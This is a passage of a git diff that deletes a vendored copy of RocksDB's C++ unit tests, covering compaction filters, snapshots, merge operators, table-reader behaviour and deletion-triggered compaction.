-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-      ASSERT_NE(ikey.sequence, (unsigned)0);
-      count++;
-      iter->Next();
-    }
-    ASSERT_EQ(count, 0);
-  }
-}
-
-// Tests the edge case where compaction does not produce any output -- all
-// entries are deleted. The compaction should create bunch of 'DeleteFile'
-// entries in VersionEdit, but none of the 'AddFile's.
-TEST_F(DBTestCompactionFilter, CompactionFilterDeletesAll) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<DeleteFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // put some data
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10 + table; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-  }
-
-  // this will produce empty file (delete compaction filter)
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ(0U, CountLiveFiles());
-
-  Reopen(options);
-
-  Iterator* itr = db_->NewIterator(ReadOptions());
-  itr->SeekToFirst();
-  // empty db
-  ASSERT_TRUE(!itr->Valid());
-
-  delete itr;
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTestCompactionFilter, CompactionFilterWithValueChange) {
-  do {
-    Options options = CurrentOptions();
-    options.num_levels = 3;
-    options.compaction_filter_factory =
-      std::make_shared<ChangeFilterFactory>();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Write 100K+1 keys, these are written to a few files
-    // in L0. We do this so that the current snapshot points
-    // to the 100001 key.The compaction filter is  not invoked
-    // on keys that are visible via a snapshot because we
-    // anyways cannot delete it.
-    const std::string value(10, 'x');
-    for (int i = 0; i < 100001; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      Put(1, key, value);
-    }
-
-    // push all files to  lower levels
-    ASSERT_OK(Flush(1));
-    if (option_config_ != kUniversalCompactionMultiLevel &&
-        option_config_ != kUniversalSubcompactions) {
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-      dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    } else {
-      dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                             nullptr);
-    }
-
-    // re-write all data again
-    for (int i = 0; i < 100001; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      Put(1, key, value);
-    }
-
-    // push all files to  lower levels. This should
-    // invoke the compaction filter for all 100000 keys.
-    ASSERT_OK(Flush(1));
-    if (option_config_ != kUniversalCompactionMultiLevel &&
-        option_config_ != kUniversalSubcompactions) {
-      dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1]);
-      dbfull()->TEST_CompactRange(1, nullptr, nullptr, handles_[1]);
-    } else {
-      dbfull()->CompactRange(CompactRangeOptions(), handles_[1], nullptr,
-                             nullptr);
-    }
-
-    // verify that all keys now have the new value that
-    // was set by the compaction process.
-    for (int i = 0; i < 100001; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%010d", i);
-      std::string newvalue = Get(1, key);
-      ASSERT_EQ(newvalue.compare(NEW_VALUE), 0);
-    }
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(DBTestCompactionFilter, CompactionFilterWithMergeOperator) {
-  std::string one, two, three, four;
-  PutFixed64(&one, 1);
-  PutFixed64(&two, 2);
-  PutFixed64(&three, 3);
-  PutFixed64(&four, 4);
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.merge_operator = MergeOperators::CreateUInt64AddOperator();
-  options.num_levels = 3;
-  // Filter out keys with value is 2.
-  options.compaction_filter_factory =
-      std::make_shared<ConditionalFilterFactory>(two);
-  DestroyAndReopen(options);
-
-  // In the same compaction, a value type needs to be deleted based on
-  // compaction filter, and there is a merge type for the key. compaction
-  // filter result is ignored.
-  ASSERT_OK(db_->Put(WriteOptions(), "foo", two));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foo", one));
-  ASSERT_OK(Flush());
-  std::string newvalue = Get("foo");
-  ASSERT_EQ(newvalue, three);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("foo");
-  ASSERT_EQ(newvalue, three);
-
-  // value key can be deleted based on compaction filter, leaving only
-  // merge keys.
-  ASSERT_OK(db_->Put(WriteOptions(), "bar", two));
-  ASSERT_OK(Flush());
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("bar");
-  ASSERT_EQ("NOT_FOUND", newvalue);
-  ASSERT_OK(db_->Merge(WriteOptions(), "bar", two));
-  ASSERT_OK(Flush());
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("bar");
-  ASSERT_EQ(two, two);
-
-  // Compaction filter never applies to merge keys.
-  ASSERT_OK(db_->Put(WriteOptions(), "foobar", one));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "foobar", two));
-  ASSERT_OK(Flush());
-  newvalue = Get("foobar");
-  ASSERT_EQ(newvalue, three);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("foobar");
-  ASSERT_EQ(newvalue, three);
-
-  // In the same compaction, both of value type and merge type keys need to be
-  // deleted based on compaction filter, and there is a merge type for the key.
-  // For both keys, compaction filter results are ignored.
-  ASSERT_OK(db_->Put(WriteOptions(), "barfoo", two));
-  ASSERT_OK(Flush());
-  ASSERT_OK(db_->Merge(WriteOptions(), "barfoo", two));
-  ASSERT_OK(Flush());
-  newvalue = Get("barfoo");
-  ASSERT_EQ(newvalue, four);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  newvalue = Get("barfoo");
-  ASSERT_EQ(newvalue, four);
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBTestCompactionFilter, CompactionFilterContextManual) {
-  KeepFilterFactory* filter = new KeepFilterFactory(true, true);
-
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_filter_factory.reset(filter);
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 8;
-  Reopen(options);
-  int num_keys_per_file = 400;
-  for (int j = 0; j < 3; j++) {
-    // Write several keys.
-    const std::string value(10, 'x');
-    for (int i = 0; i < num_keys_per_file; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%08d%02d", i, j);
-      Put(key, value);
-    }
-    dbfull()->TEST_FlushMemTable();
-    // Make sure next file is much smaller so automatic compaction will not
-    // be triggered.
-    num_keys_per_file /= 2;
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  // Force a manual compaction
-  cfilter_count = 0;
-  filter->expect_manual_compaction_.store(true);
-  filter->expect_full_compaction_.store(true);
-  filter->expect_cf_id_.store(0);
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(cfilter_count, 700);
-  ASSERT_EQ(NumSortedRuns(0), 1);
-  ASSERT_TRUE(filter->compaction_filter_created());
-
-  // Verify total number of keys is correct after manual compaction.
-  {
-    int count = 0;
-    int total = 0;
-    Arena arena;
-    InternalKeyComparator icmp(options.comparator);
-    RangeDelAggregator range_del_agg(icmp, {} /* snapshots */);
-    ScopedArenaIterator iter(
-        dbfull()->NewInternalIterator(&arena, &range_del_agg));
-    iter->SeekToFirst();
-    ASSERT_OK(iter->status());
-    while (iter->Valid()) {
-      ParsedInternalKey ikey(Slice(), 0, kTypeValue);
-      ikey.sequence = -1;
-      ASSERT_EQ(ParseInternalKey(iter->key(), &ikey), true);
-      total++;
-      if (ikey.sequence != 0) {
-        count++;
-      }
-      iter->Next();
-    }
-    ASSERT_EQ(total, 700);
-    ASSERT_EQ(count, 1);
-  }
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTestCompactionFilter, CompactionFilterContextCfId) {
-  KeepFilterFactory* filter = new KeepFilterFactory(false, true);
-  filter->expect_cf_id_.store(1);
-
-  Options options = CurrentOptions();
-  options.compaction_filter_factory.reset(filter);
-  options.compression = kNoCompression;
-  options.level0_file_num_compaction_trigger = 2;
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  int num_keys_per_file = 400;
-  for (int j = 0; j < 3; j++) {
-    // Write several keys.
-    const std::string value(10, 'x');
-    for (int i = 0; i < num_keys_per_file; i++) {
-      char key[100];
-      snprintf(key, sizeof(key), "B%08d%02d", i, j);
-      Put(1, key, value);
-    }
-    Flush(1);
-    // Make sure next file is much smaller so automatic compaction will not
-    // be triggered.
-    num_keys_per_file /= 2;
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  ASSERT_TRUE(filter->compaction_filter_created());
-}
-
-#ifndef ROCKSDB_LITE
-// Compaction filters should only be applied to records that are newer than the
-// latest snapshot. This test inserts records and applies a delete filter.
-TEST_F(DBTestCompactionFilter, CompactionFilterSnapshot) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<DeleteFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Put some data.
-  const Snapshot* snapshot = nullptr;
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-
-    if (table == 0) {
-      snapshot = db_->GetSnapshot();
-    }
-  }
-  assert(snapshot != nullptr);
-
-  cfilter_count = 0;
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // The filter should delete 10 records.
-  ASSERT_EQ(30U, cfilter_count);
-
-  // Release the snapshot and compact again -> now all records should be
-  // removed.
-  db_->ReleaseSnapshot(snapshot);
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  ASSERT_EQ(0U, CountLiveFiles());
-}
-
-// Compaction filters should only be applied to records that are newer than the
-// latest snapshot. However, if the compaction filter asks to ignore snapshots
-// records newer than the snapshot will also be processed
-TEST_F(DBTestCompactionFilter, CompactionFilterIgnoreSnapshot) {
-  std::string five = ToString(5);
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<DeleteISFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Put some data.
-  const Snapshot* snapshot = nullptr;
-  for (int table = 0; table < 4; ++table) {
-    for (int i = 0; i < 10; ++i) {
-      Put(ToString(table * 100 + i), "val");
-    }
-    Flush();
-
-    if (table == 0) {
-      snapshot = db_->GetSnapshot();
-    }
-  }
-  assert(snapshot != nullptr);
-
-  cfilter_count = 0;
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // The filter should delete 40 records.
-  ASSERT_EQ(40U, cfilter_count);
-
-  {
-    // Scan the entire database as of the snapshot to ensure
-    // that nothing is left
-    ReadOptions read_options;
-    read_options.snapshot = snapshot;
-    std::unique_ptr<Iterator> iter(db_->NewIterator(read_options));
-    iter->SeekToFirst();
-    int count = 0;
-    while (iter->Valid()) {
-      count++;
-      iter->Next();
-    }
-    ASSERT_EQ(count, 6);
-    read_options.snapshot = 0;
-    std::unique_ptr<Iterator> iter1(db_->NewIterator(read_options));
-    iter1->SeekToFirst();
-    count = 0;
-    while (iter1->Valid()) {
-      count++;
-      iter1->Next();
-    }
-    // We have deleted 10 keys from 40 using the compaction filter
-    //  Keys 6-9 before the snapshot and 100-105 after the snapshot
-    ASSERT_EQ(count, 30);
-  }
-
-  // Release the snapshot and compact again -> now all records should be
-  // removed.
-  db_->ReleaseSnapshot(snapshot);
-}
-#endif  // ROCKSDB_LITE
-
-TEST_F(DBTestCompactionFilter, SkipUntil) {
-  Options options = CurrentOptions();
-  options.compaction_filter_factory = std::make_shared<SkipEvenFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  // Write 100K keys, these are written to a few files in L0.
-  for (int table = 0; table < 4; ++table) {
-    // Key ranges in tables are [0, 38], [106, 149], [212, 260], [318, 371].
-    for (int i = table * 6; i < 39 + table * 11; ++i) {
-      char key[100];
-      snprintf(key, sizeof(key), "%010d", table * 100 + i);
-      Put(key, std::to_string(table * 1000 + i));
-    }
-    Flush();
-  }
-
-  cfilter_skips = 0;
-  ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  // Number of skips in tables: 2, 3, 3, 3.
-  ASSERT_EQ(11, cfilter_skips);
-
-  for (int table = 0; table < 4; ++table) {
-    for (int i = table * 6; i < 39 + table * 11; ++i) {
-      int k = table * 100 + i;
-      char key[100];
-      snprintf(key, sizeof(key), "%010d", table * 100 + i);
-      auto expected = std::to_string(table * 1000 + i);
-      std::string val;
-      Status s = db_->Get(ReadOptions(), key, &val);
-      if (k / 10 % 2 == 0) {
-        ASSERT_TRUE(s.IsNotFound());
-      } else {
-        ASSERT_OK(s);
-        ASSERT_EQ(expected, val);
-      }
-    }
-  }
-}
-
-TEST_F(DBTestCompactionFilter, SkipUntilWithBloomFilter) {
-  BlockBasedTableOptions table_options;
-  table_options.whole_key_filtering = false;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(100, false));
-
-  Options options = CurrentOptions();
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  options.prefix_extractor.reset(NewCappedPrefixTransform(9));
-  options.compaction_filter_factory = std::make_shared<SkipEvenFilterFactory>();
-  options.disable_auto_compactions = true;
-  options.create_if_missing = true;
-  DestroyAndReopen(options);
-
-  Put("0000000010", "v10");
-  Put("0000000020", "v20"); // skipped
-  Put("0000000050", "v50");
-  Flush();
-
-  cfilter_skips = 0;
-  EXPECT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  EXPECT_EQ(1, cfilter_skips);
-
-  Status s;
-  std::string val;
-
-  s = db_->Get(ReadOptions(), "0000000010", &val);
-  ASSERT_OK(s);
-  EXPECT_EQ("v10", val);
-
-  s = db_->Get(ReadOptions(), "0000000020", &val);
-  EXPECT_TRUE(s.IsNotFound());
-
-  s = db_->Get(ReadOptions(), "0000000050", &val);
-  ASSERT_OK(s);
-  EXPECT_EQ("v50", val);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_compaction_test.cc b/thirdparty/rocksdb/db/db_compaction_test.cc
deleted file mode 100644
index ca77d5b..0000000
--- a/thirdparty/rocksdb/db/db_compaction_test.cc
+++ /dev/null
@@ -1,2835 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "port/port.h"
-#include "rocksdb/experimental.h"
-#include "rocksdb/utilities/convenience.h"
-#include "util/sync_point.h"
-namespace rocksdb {
-
-// SYNC_POINT is not supported in released Windows mode.
-#if !defined(ROCKSDB_LITE)
-
-class DBCompactionTest : public DBTestBase {
- public:
-  DBCompactionTest() : DBTestBase("/db_compaction_test") {}
-};
-
-class DBCompactionTestWithParam
-    : public DBTestBase,
-      public testing::WithParamInterface<std::tuple<uint32_t, bool>> {
- public:
-  DBCompactionTestWithParam() : DBTestBase("/db_compaction_test") {
-    max_subcompactions_ = std::get<0>(GetParam());
-    exclusive_manual_compaction_ = std::get<1>(GetParam());
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  uint32_t max_subcompactions_;
-  bool exclusive_manual_compaction_;
-};
-
-class DBCompactionDirectIOTest : public DBCompactionTest,
-                                 public ::testing::WithParamInterface<bool> {
- public:
-  DBCompactionDirectIOTest() : DBCompactionTest() {}
-};
-
-namespace {
-
-class FlushedFileCollector : public EventListener {
- public:
-  FlushedFileCollector() {}
-  ~FlushedFileCollector() {}
-
-  virtual void OnFlushCompleted(DB* db, const FlushJobInfo& info) override {
-    std::lock_guard<std::mutex> lock(mutex_);
-    flushed_files_.push_back(info.file_path);
-  }
-
-  std::vector<std::string> GetFlushedFiles() {
-    std::lock_guard<std::mutex> lock(mutex_);
-    std::vector<std::string> result;
-    for (auto fname : flushed_files_) {
-      result.push_back(fname);
-    }
-    return result;
-  }
-
-  void ClearFlushedFiles() { flushed_files_.clear(); }
-
- private:
-  std::vector<std::string> flushed_files_;
-  std::mutex mutex_;
-};
-
-static const int kCDTValueSize = 1000;
-static const int kCDTKeysPerBuffer = 4;
-static const int kCDTNumLevels = 8;
-Options DeletionTriggerOptions(Options options) {
-  options.compression = kNoCompression;
-  options.write_buffer_size = kCDTKeysPerBuffer * (kCDTValueSize + 24);
-  options.min_write_buffer_number_to_merge = 1;
-  options.max_write_buffer_number_to_maintain = 0;
-  options.num_levels = kCDTNumLevels;
-  options.level0_file_num_compaction_trigger = 1;
-  options.target_file_size_base = options.write_buffer_size * 2;
-  options.target_file_size_multiplier = 2;
-  options.max_bytes_for_level_base =
-      options.target_file_size_base * options.target_file_size_multiplier;
-  options.max_bytes_for_level_multiplier = 2;
-  options.disable_auto_compactions = false;
-  return options;
-}
-
-bool HaveOverlappingKeyRanges(
-    const Comparator* c,
-    const SstFileMetaData& a, const SstFileMetaData& b) {
-  if (c->Compare(a.smallestkey, b.smallestkey) >= 0) {
-    if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-      // b.smallestkey <= a.smallestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-    // a.smallestkey < b.smallestkey <= a.largestkey
-    return true;
-  }
-  if (c->Compare(a.largestkey, b.largestkey) <= 0) {
-    if (c->Compare(a.largestkey, b.smallestkey) >= 0) {
-      // b.smallestkey <= a.largestkey <= b.largestkey
-      return true;
-    }
-  } else if (c->Compare(a.smallestkey, b.largestkey) <= 0) {
-    // a.smallestkey <= b.largestkey < a.largestkey
-    return true;
-  }
-  return false;
-}
-
-// Identifies all files between level "min_level" and "max_level"
-// which has overlapping key range with "input_file_meta".
-void GetOverlappingFileNumbersForLevelCompaction(
-    const ColumnFamilyMetaData& cf_meta,
-    const Comparator* comparator,
-    int min_level, int max_level,
-    const SstFileMetaData* input_file_meta,
-    std::set<std::string>* overlapping_file_names) {
-  std::set<const SstFileMetaData*> overlapping_files;
-  overlapping_files.insert(input_file_meta);
-  for (int m = min_level; m <= max_level; ++m) {
-    for (auto& file : cf_meta.levels[m].files) {
-      for (auto* included_file : overlapping_files) {
-        if (HaveOverlappingKeyRanges(
-                comparator, *included_file, file)) {
-          overlapping_files.insert(&file);
-          overlapping_file_names->insert(file.name);
-          break;
-        }
-      }
-    }
-  }
-}
-
-void VerifyCompactionResult(
-    const ColumnFamilyMetaData& cf_meta,
-    const std::set<std::string>& overlapping_file_numbers) {
-#ifndef NDEBUG
-  for (auto& level : cf_meta.levels) {
-    for (auto& file : level.files) {
-      assert(overlapping_file_numbers.find(file.name) ==
-             overlapping_file_numbers.end());
-    }
-  }
-#endif
-}
-
-const SstFileMetaData* PickFileRandomly(
-    const ColumnFamilyMetaData& cf_meta,
-    Random* rand,
-    int* level = nullptr) {
-  auto file_id = rand->Uniform(static_cast<int>(
-      cf_meta.file_count)) + 1;
-  for (auto& level_meta : cf_meta.levels) {
-    if (file_id <= level_meta.files.size()) {
-      if (level != nullptr) {
-        *level = level_meta.level;
-      }
-      auto result = rand->Uniform(file_id);
-      return &(level_meta.files[result]);
-    }
-    file_id -= static_cast<uint32_t>(level_meta.files.size());
-  }
-  assert(false);
-  return nullptr;
-}
-}  // anonymous namespace
-
-// All the TEST_P tests run once with sub_compactions disabled (i.e.
-// options.max_subcompactions = 1) and once with it enabled
-TEST_P(DBCompactionTestWithParam, CompactionDeletionTrigger) {
-  for (int tid = 0; tid < 3; ++tid) {
-    uint64_t db_size[2];
-    Options options = DeletionTriggerOptions(CurrentOptions());
-    options.max_subcompactions = max_subcompactions_;
-
-    if (tid == 1) {
-      // the following only disable stats update in DB::Open()
-      // and should not affect the result of this test.
-      options.skip_stats_update_on_db_open = true;
-    } else if (tid == 2) {
-      // third pass with universal compaction
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 1;
-    }
-
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    const int kTestSize = kCDTKeysPerBuffer * 1024;
-    std::vector<std::string> values;
-    for (int k = 0; k < kTestSize; ++k) {
-      values.push_back(RandomString(&rnd, kCDTValueSize));
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[0] = Size(Key(0), Key(kTestSize - 1));
-
-    for (int k = 0; k < kTestSize; ++k) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[1] = Size(Key(0), Key(kTestSize - 1));
-
-    // must have much smaller db size.
-    ASSERT_GT(db_size[0] / 3, db_size[1]);
-  }
-}
-
-TEST_F(DBCompactionTest, SkipStatsUpdateTest) {
-  // This test verify UpdateAccumulatedStats is not on
-  // if options.skip_stats_update_on_db_open = true
-  // The test will need to be updated if the internal behavior changes.
-
-  Options options = DeletionTriggerOptions(CurrentOptions());
-  options.env = env_;
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  const int kTestSize = kCDTKeysPerBuffer * 512;
-  std::vector<std::string> values;
-  for (int k = 0; k < kTestSize; ++k) {
-    values.push_back(RandomString(&rnd, kCDTValueSize));
-    ASSERT_OK(Put(Key(k), values[k]));
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Reopen the DB with stats-update disabled
-  options.skip_stats_update_on_db_open = true;
-  env_->random_file_open_counter_.store(0);
-  Reopen(options);
-
-  // As stats-update is disabled, we expect a very low number of
-  // random file open.
-  // Note that this number must be changed accordingly if we change
-  // the number of files needed to be opened in the DB::Open process.
-  const int kMaxFileOpenCount = 10;
-  ASSERT_LT(env_->random_file_open_counter_.load(), kMaxFileOpenCount);
-
-  // Repeat the reopen process, but this time we enable
-  // stats-update.
-  options.skip_stats_update_on_db_open = false;
-  env_->random_file_open_counter_.store(0);
-  Reopen(options);
-
-  // Since we do a normal stats update on db-open, there
-  // will be more random open files.
-  ASSERT_GT(env_->random_file_open_counter_.load(), kMaxFileOpenCount);
-}
-
-TEST_F(DBCompactionTest, TestTableReaderForCompaction) {
-  Options options = CurrentOptions();
-  options.env = env_;
-  options.new_table_reader_for_compaction_inputs = true;
-  options.max_open_files = 100;
-  options.level0_file_num_compaction_trigger = 3;
-  DestroyAndReopen(options);
-  Random rnd(301);
-
-  int num_table_cache_lookup = 0;
-  int num_new_table_reader = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TableCache::FindTable:0", [&](void* arg) {
-        assert(arg != nullptr);
-        bool no_io = *(reinterpret_cast<bool*>(arg));
-        if (!no_io) {
-          // filter out cases for table properties queries.
-          num_table_cache_lookup++;
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "TableCache::GetTableReader:0",
-      [&](void* arg) { num_new_table_reader++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  for (int k = 0; k < options.level0_file_num_compaction_trigger; ++k) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-    ASSERT_OK(Put(Key(10 - k), "bar"));
-    if (k < options.level0_file_num_compaction_trigger - 1) {
-      num_table_cache_lookup = 0;
-      Flush();
-      dbfull()->TEST_WaitForCompact();
-      // preloading iterator issues one table cache lookup and create
-      // a new table reader.
-      ASSERT_EQ(num_table_cache_lookup, 1);
-      ASSERT_EQ(num_new_table_reader, 1);
-
-      num_table_cache_lookup = 0;
-      num_new_table_reader = 0;
-      ASSERT_EQ(Key(k), Get(Key(k)));
-      // lookup iterator from table cache and no need to create a new one.
-      ASSERT_EQ(num_table_cache_lookup, 1);
-      ASSERT_EQ(num_new_table_reader, 0);
-    }
-  }
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  // Preloading iterator issues one table cache lookup and creates
-  // a new table reader. One file is created for flush and one for compaction.
-  // Compaction inputs make no table cache look-up for data/range deletion
-  // iterators
-  ASSERT_EQ(num_table_cache_lookup, 2);
-  // Create new iterator for:
-  // (1) 1 for verifying flush results
-  // (2) 3 for compaction input files
-  // (3) 1 for verifying compaction results.
-  ASSERT_EQ(num_new_table_reader, 5);
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  ASSERT_EQ(Key(1), Get(Key(1)));
-  ASSERT_EQ(num_table_cache_lookup, 1);
-  ASSERT_EQ(num_new_table_reader, 0);
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  CompactRangeOptions cro;
-  cro.change_level = true;
-  cro.target_level = 2;
-  cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  db_->CompactRange(cro, nullptr, nullptr);
-  // Only verifying compaction outputs issues one table cache lookup
-  // for both data block and range deletion block).
-  ASSERT_EQ(num_table_cache_lookup, 1);
-  // One for compaction input, one for verifying compaction results.
-  ASSERT_EQ(num_new_table_reader, 2);
-
-  num_table_cache_lookup = 0;
-  num_new_table_reader = 0;
-  ASSERT_EQ(Key(1), Get(Key(1)));
-  ASSERT_EQ(num_table_cache_lookup, 1);
-  ASSERT_EQ(num_new_table_reader, 0);
-
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-}
-
-TEST_P(DBCompactionTestWithParam, CompactionDeletionTriggerReopen) {
-  for (int tid = 0; tid < 2; ++tid) {
-    uint64_t db_size[3];
-    Options options = DeletionTriggerOptions(CurrentOptions());
-    options.max_subcompactions = max_subcompactions_;
-
-    if (tid == 1) {
-      // second pass with universal compaction
-      options.compaction_style = kCompactionStyleUniversal;
-      options.num_levels = 1;
-    }
-
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    // round 1 --- insert key/value pairs.
-    const int kTestSize = kCDTKeysPerBuffer * 512;
-    std::vector<std::string> values;
-    for (int k = 0; k < kTestSize; ++k) {
-      values.push_back(RandomString(&rnd, kCDTValueSize));
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[0] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-
-    // round 2 --- disable auto-compactions and issue deletions.
-    options.create_if_missing = false;
-    options.disable_auto_compactions = true;
-    Reopen(options);
-
-    for (int k = 0; k < kTestSize; ++k) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    db_size[1] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-    // as auto_compaction is off, we shouldn't see too much reduce
-    // in db size.
-    ASSERT_LT(db_size[0] / 3, db_size[1]);
-
-    // round 3 --- reopen db with auto_compaction on and see if
-    // deletion compensation still work.
-    options.disable_auto_compactions = false;
-    Reopen(options);
-    // insert relatively small amount of data to trigger auto compaction.
-    for (int k = 0; k < kTestSize / 10; ++k) {
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[2] = Size(Key(0), Key(kTestSize - 1));
-    // this time we're expecting significant drop in size.
-    ASSERT_GT(db_size[0] / 3, db_size[2]);
-  }
-}
-
-TEST_F(DBCompactionTest, DisableStatsUpdateReopen) {
-  uint64_t db_size[3];
-  for (int test = 0; test < 2; ++test) {
-    Options options = DeletionTriggerOptions(CurrentOptions());
-    options.skip_stats_update_on_db_open = (test == 0);
-
-    env_->random_read_counter_.Reset();
-    DestroyAndReopen(options);
-    Random rnd(301);
-
-    // round 1 --- insert key/value pairs.
-    const int kTestSize = kCDTKeysPerBuffer * 512;
-    std::vector<std::string> values;
-    for (int k = 0; k < kTestSize; ++k) {
-      values.push_back(RandomString(&rnd, kCDTValueSize));
-      ASSERT_OK(Put(Key(k), values[k]));
-    }
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[0] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-
-    // round 2 --- disable auto-compactions and issue deletions.
-    options.create_if_missing = false;
-    options.disable_auto_compactions = true;
-
-    env_->random_read_counter_.Reset();
-    Reopen(options);
-
-    for (int k = 0; k < kTestSize; ++k) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    db_size[1] = Size(Key(0), Key(kTestSize - 1));
-    Close();
-    // as auto_compaction is off, we shouldn't see too much reduce
-    // in db size.
-    ASSERT_LT(db_size[0] / 3, db_size[1]);
-
-    // round 3 --- reopen db with auto_compaction on and see if
-    // deletion compensation still work.
-    options.disable_auto_compactions = false;
-    Reopen(options);
-    dbfull()->TEST_WaitForFlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-    db_size[2] = Size(Key(0), Key(kTestSize - 1));
-
-    if (options.skip_stats_update_on_db_open) {
-      // If update stats on DB::Open is disable, we don't expect
-      // deletion entries taking effect.
-      ASSERT_LT(db_size[0] / 3, db_size[2]);
-    } else {
-      // Otherwise, we should see a significant drop in db size.
